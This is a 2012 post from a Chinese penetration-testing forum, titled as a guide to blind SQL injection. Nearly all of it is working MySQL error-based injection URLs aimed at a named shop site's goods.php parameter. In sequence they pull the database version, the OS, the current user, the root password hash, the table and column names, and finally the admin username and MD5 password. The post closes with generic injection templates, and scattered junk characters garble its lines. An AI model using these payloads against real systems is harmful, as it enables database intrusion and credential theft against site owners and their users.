找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 盲注详细内容
返回列表 发新帖
查看: 2432|回复: 0
打印 上一主题 下一主题

盲注详细内容

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-5 14:59:30 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
判断版本号
' f8 f% i: G+ N6 X  S7 ohttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23" x" g1 L6 I7 V+ x

0 z% u1 r. S( g' X- P判断系统
6 I8 R0 M; J7 \. n7 I9 C* k  |3 M5 }" W; _; H
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%235 d( M+ c  v8 r$ M: N

: k% S8 M! j" g2 r+ p1 i: P* N" x1 H5 }
4 L& X, S+ D8 I+ V  K, o( X1 ^  U$ ]% d
当前 user()' J# R% g  F- ?

& a' W2 `" r+ G- k, @7 C1 Nhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23: G, Y  F' l3 g7 [" F* W; \& v

! p1 o' X9 x* L: v7 M/ ]5 V$ D2 Y
( O! L6 ]. @4 q7 z
( v/ V( M# n/ m+ V# o. T当前 database()* k/ W) E. i6 g- h1 W0 l, ]
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23, |2 }/ Y- g$ ^" r+ `
/ D, j3 V2 @/ t; {. i% F

; F3 e+ k' T$ y% h# g2 q+ I. b- k! P1 u
0 e! S& @$ ~8 ^$ ~/ Q  v
1 Y- X' s% z0 x1 kroot hash$ \* n# U( R% K6 }

0 ]; ?4 {' V- c$ Ghttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
( d; e' a' O% F( D, r2 {
+ X7 c+ \( n( M0 \+ w2 L- n! C
7 N8 M, f- Q6 _9 a5 `3 \9 W
1 k  y$ d  C! p9 F0 t6 g8 X9 x' }当前 数据库表名
$ Q! O2 W8 V" H& K5 A" [  h" w) I+ S0 M3 b2 U6 @- x8 P! h
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23' y/ S5 w7 t8 {5 n% [
: [. R3 ~, r. S  B1 I
/ b+ g  j& v7 p0 L! _

5 i7 e  \3 ]( y$ b! a4 j当前 数据库 user_name 字段7 M* Z8 a; }( v3 u" l
2 M9 U, s! Y+ D$ R
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23% G  X4 C" U1 h# O9 x8 j

' c! c% w* i9 M# I. W8 P当前 数据库 字段 password
- C1 a/ d# \  L: ?$ ohttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23* V+ }- z3 b7 T$ w+ ?

) |- B' K/ _" J' f% D1 W
, D* {" J) J% f, P& A8 m9 h
4 {# `2 ]9 B' [* H获得 admin passwd(md5)
7 ], O+ H+ N/ F" K& x8 @$ s, B
! f% W( A/ u* S0 u! v# j
' `3 {/ J5 ~" Ahttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
; T* l! {$ s, f& a0 l
& R$ {& ?0 ]& A( K$ s% c报错注射
4 j/ L; G* b! N5 n$ z- MSELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
1 u( o  V( W: |# i1 i( S7 G
. J. t2 k1 K9 e# O8 C/ N8 NSELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)% G6 N6 \! e- ?4 M

, F& U0 N4 C! m7 ^and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表